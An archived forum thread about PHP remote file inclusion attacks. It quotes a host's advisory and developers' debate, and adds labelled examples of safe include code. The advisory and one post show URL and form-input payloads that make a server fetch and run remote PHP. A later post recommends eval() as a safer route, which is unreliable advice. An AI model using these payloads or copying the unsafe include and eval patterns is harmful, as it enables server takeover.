
PHP blamed for security problems

Here's what this morning's security advisory read here:

``In the last 3 months we have noticed a marked increase in the number of
web-server attacks and successful compromise on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_fopen change to PHP is about as much as we can do here.''

They offer a more detailed description of the problem:

``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfully gained
shell access via insecure PHP scripts.

Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.

As you may be aware, PHP provides a number of functions for
opening files such as 'fopen()' and it's also possible to
pass an HTTP or FTP URL to these such that
fopen('http://www.dsvr.co.uk/'); will fetch the contents of
the DSVR homepage for PHP to treat as a file.

What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.

Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. These
pages can be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard
header/footer.

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05
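The advisory above shows the vulnerable dispatcher but not the fix. What follows is an added example, not code from the thread or from the hosting company: the same header/page/footer layout with the page name looked up in an allowlist, the resolved path checked against the page directory, and a small check for the php.ini directives that make URL includes possible at all. The directory layout (/var/www/site/pages outside the document root) and the page names are assumptions for the example. allow_url_include did not exist when this thread was written (it was split out of allow_url_fopen in PHP 5.2), so on the PHP 4 hosts discussed here allow_url_fopen alone decides whether include() will fetch a URL.

```php
<?php
declare(strict_types=1);
// Added example; not code from the original thread or from the hosting company.
// Assumed layout (hypothetical): the document root is /var/www/site/htdocs and
// the page fragments live in /var/www/site/pages, which the web server never
// serves directly and which is not on include_path.

const PAGE_DIR = '/var/www/site/pages';

// Allowlist: the URL carries a short name, the table maps it to a file.
// Anything not in this table is rejected, so 'http://...', '../../etc/passwd',
// 'php://input' and the like never reach include().
const PAGES = [
    'home'    => 'home.inc.php',
    'about'   => 'about.inc.php',
    'contact' => 'contact.inc.php',
];

/**
 * Map a requested page name to an absolute path under PAGE_DIR, or null.
 */
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: confirm the resolved file really sits under PAGE_DIR,
    // which catches a bad allowlist entry or a symlink planted in the directory.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Names of the php.ini directives, if enabled, that let include() reach
 * beyond local files or let the query string populate $page directly.
 * allow_url_fopen and allow_url_include are PHP_INI_SYSTEM, so they can only
 * be fixed in php.ini or the server config, never with ini_set() at runtime;
 * a deployment check can use this to refuse to run with them on.
 */
function url_include_risks(): array
{
    $risky = [];
    foreach (['allow_url_fopen', 'allow_url_include', 'register_globals'] as $directive) {
        // ini_get() returns false for directives this PHP version no longer knows.
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $directive;
        }
    }
    return $risky;
}

// Vulnerable form from the advisory, for comparison (never do this):
//     include($page);
// With register_globals on (common on PHP 4 hosts) $page comes straight from
// the query string; with allow_url_fopen on, page=http://attacker/x.txt is
// fetched and executed as PHP on the server.

$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
$file = resolve_page($requested);
if ($file === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit;
}

echo "<html>\n";
echo "<!-- standard header -->\n";
include $file;
echo "<!-- standard footer -->\n";
echo "</html>\n";
```

The allowlist does the real work; the realpath() prefix check is there so that a mistake in the table (or a symlink an attacker managed to drop into the page directory through some other hole) still cannot pull in a file from elsewhere. Rejecting with a 404 rather than falling back to a default page also keeps the probe visible in the access log.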
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.org> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
Security through obscurity is a technical phrase from cryptography.


And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).


Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.

The phrase "security through obscurity" applies to cryptographic
devices - which must be fielded to be used - and once fielded it
has to be assumed that your opponent can capture one of your
transmitters and can reverse engineer it.

PHP code on a server is completely different. The code never
leaves the server. Its workings are not exposed and there's
no way to dismantle it, poke electrodes at it, or scan its
insides and - i.e. there's no way to see how it does what
it does except by looking at its inputs and outputs.

The server can be well defended. It doesn't *have* to be carried
into battle by mortal soldiers - instead, it can be placed inside
Fort Knox.

Also, note that the NSA keeps its cryptographic designs secret
for as long as they can manage. Obviously they have a different
perspective on the phrase "security through obscurity" from you.

They do this to cause a time delay between their systems being
deployed and them being captured, analysed and reverse engineered.
That same time delay is significant for software engineers
attempting to clone a system, mimic its functionality or implement
its interfaces.

Exposing practically all the files on the server - regardless of
whether they are in password-protected web directories - will
often represent a security breach.

I should not be expected to debate this simple point - it is too
obvious.
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #31
th******@yahoo.com wrote or quoted:
Tim Tyler <ti*@tt1lock.org> wrote:

In this case, PHP is at fault.


IMO, that is almost like saying "the OS is at fault" for allowing users
to delete files or install software. (granted, a require() that can
slurp in and evaluate code from across the net is kind of asking for
problems)


I see a few differences - but:

Certainly, many OSes are not remotely safe against their own users.

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user - partly on the grounds that
many of them don't know what they are doing - and it would be a waste
to allow them to trash their own machines through their own idiocy.

http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #32
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user


Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).

This does *not* mean that I think there should be a law against it.
There is a vast difference between that which should not be done and
that which should be legally regulated, something too many people fail
to realize (which is why 40% of the USA's GNP goes to support our
government bureaucracy.)

However, people who do use them unsafely should be harshly penalized and
prevented from doing so again.

bblackmoor
2004-03-21
Jul 17 '05 #33
On 2004-03-20, Tim Tyler <ti*@tt1lock.org> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.org> wrote:
> Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
> Security through obscurity is a technical phrase from cryptography.
And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).


Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.


But what makes this a problem for PHP and not for other languages?
Every scripting language has this "problem".
Perhaps you think compiled binaries are more "secure"; in this case
there is Zend's encoding engine. So I still don't see a problem that is
specific to PHP.
PHP code on a server is completely different. The code never
leaves the server. Its workings are not exposed and there's
no way to dismantle it, poke electrodes at it, or scan its
insides and - i.e. there's no way to see how it does what
it does except by looking at its inputs and outputs.


From this point of view, I don't see how you could blame PHP for being
insecure.

--
http://home.mysth.be/~timvw
Jul 17 '05 #34
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-20, Tim Tyler <ti*@tt1lock.org> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.org> wrote:
> Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
> Security through obscurity is a technical phrase from cryptography.

And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).
Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.


But what makes this a problem for PHP and not for other languages?


Nothing. That this was a problem only for PHP was never asserted.
Every scripting language has this "problem".


The problems are:

* That it's easy to write a script that accidentally allows access
to everything the webserver has access to;

* That it's possible to write a script that allows access to
everything the webserver has access to;

Not every scripting language has these problems.

Some run in sandboxes, place restrictions on file access - and so on.

PHP in "safe mode" - with an appropriate bunch of settings for
things like "open_basedir" - is an attempt to do much the same
sort of thing.
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #35
Brandon Blackmoor wrote:
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user

Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).

And wood chisels! I mean, you just wouldn't believe the damage a sharp wood
chisel can cause in the hands of a novice computer owner, ahem, I mean, novice
homeowner.
--
Joel Farris
twinkledust Designs
http://twinkledust.com

AIM chat: FarrisJoel

Q: Because it reverses the logical flow of conversation.
A: Why is top posting frowned upon?

Jul 17 '05 #36

"Joel Farris" <th*********@valid.address> wrote in message
news:2o********************@comcast.com...
Brandon Blackmoor wrote:
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user

Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).


And who gets to decide who is competent? You? W3C? Some other elitist
group?

The problem with attitudes like this is that they tend to not be able to see
past themselves. It reminds me of a saying that a friend of mine has about
gun control laws:

"Nobody is really against gun control. Nobody is really for gun control,
either. See, I do not think you should be able to own so much as a spring
loaded cork gun. I, on the other hand, should be permitted to own rocket
propelled grenades."
Jul 17 '05 #37
"CountScubula" <me@scantek.hotmail.com> wrote in message news:<3y******************@newssvr27.news.prodigy.com>...
True it will not include the source, but only the output, you can write a
php script to output valid code.

an example would be:

<?php
print "<?php\n";
print "// do some evil here\n";
print "?>\n";
?>

and if you included this from another site it would appear to be valid code.

I agree that it is not a PHP concern, but a lack of forethought (hey, I am
guilty too, but I get to it). The same security risks are in Perl as well;
they are just easier in PHP.

One of the biggest things I see is people taking data from an input form,
writing it to a file, then doing an include() on it. Just put
<?php include("http://www.bla.com/script.php"); ?> into a form input box and
you're good to go.


One defense is to store all your PHP files outside of the www folder?
Save for index? And hardcode the includes? As in, you have index.php
at the root level of your site, and in it it goes up a level, out of
the reach of the web, to include files, like so:

include("../header.php");
include("../footer.php");
Jul 17 '05 #38
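The two problems raised in this post are user input written to a file that later gets include()d, and include paths that a visitor can influence. Below is an added example (mine, not code from either poster) that puts the unsafe pattern beside a version that treats the submission as data all the way through: the server picks the file name, the file lives outside the document root as the post suggests, it is read back with file_get_contents() rather than include(), and it is HTML-escaped on output. The directory /var/www/site/data and the form field name 'note' are assumptions for the example.

```php
<?php
declare(strict_types=1);
// Added example; not code from the original thread.
// Assumed layout (hypothetical): DATA_DIR is outside the document root and
// is not on include_path; the form field is called 'note'.

const DATA_DIR = '/var/www/site/data';

// The pattern described in the post, for comparison (never do this): the
// submission is written to disk and then include()d, so a visitor who types
// PHP source gets it executed on the next request.
function save_and_include_unsafe(string $note): void
{
    $file = DATA_DIR . '/note.txt';
    file_put_contents($file, $note);
    include $file;
}

// Safe: the submission is stored as data under a name the visitor does not
// choose, and is never handed to include(), require() or eval().
function save_note(string $note): string
{
    $note = substr($note, 0, 4096);                  // cap the size
    $name = bin2hex(random_bytes(16)) . '.txt';      // server-chosen name
    file_put_contents(DATA_DIR . '/' . $name, $note, LOCK_EX);
    return $name;
}

// Safe: the stored text is read back with file_get_contents(), which does not
// parse PHP, and HTML-escaped on output, so an opening PHP tag in the note is
// rendered literally instead of executed.
function render_note(string $name): string
{
    // Accept only names of the exact shape save_note() produces; '../',
    // 'http://' and null bytes are rejected before the filesystem is touched.
    if (!preg_match('/\A[0-9a-f]{32}\.txt\z/', $name)) {
        return '';
    }
    $content = file_get_contents(DATA_DIR . '/' . $name);
    if ($content === false) {
        return '';
    }
    return '<pre>' . htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && isset($_POST['note']) && is_string($_POST['note'])) {
    echo render_note(save_note($_POST['note']));
}
```

The point is the separation: code the developer wrote is the only thing that ever goes through include(), and it is named with literal paths (as in the header/footer example above), while anything a visitor supplied is only ever read, escaped and printed.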
Tim Van Wassenhove <eu**@pi.be> wrote in message news:<c3*************@ID-188825.news.uni-berlin.de>...
First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.


Recently, in my own code, I've been trying to get away from include()
entirely. Instead I open the file and read it into a string. Then I
evaluate the string to see if it is what I expect. Then I send it to
eval(). Include() is dangerous because you get no chance to test the
code you're about to bring in.
Jul 17 '05 #39
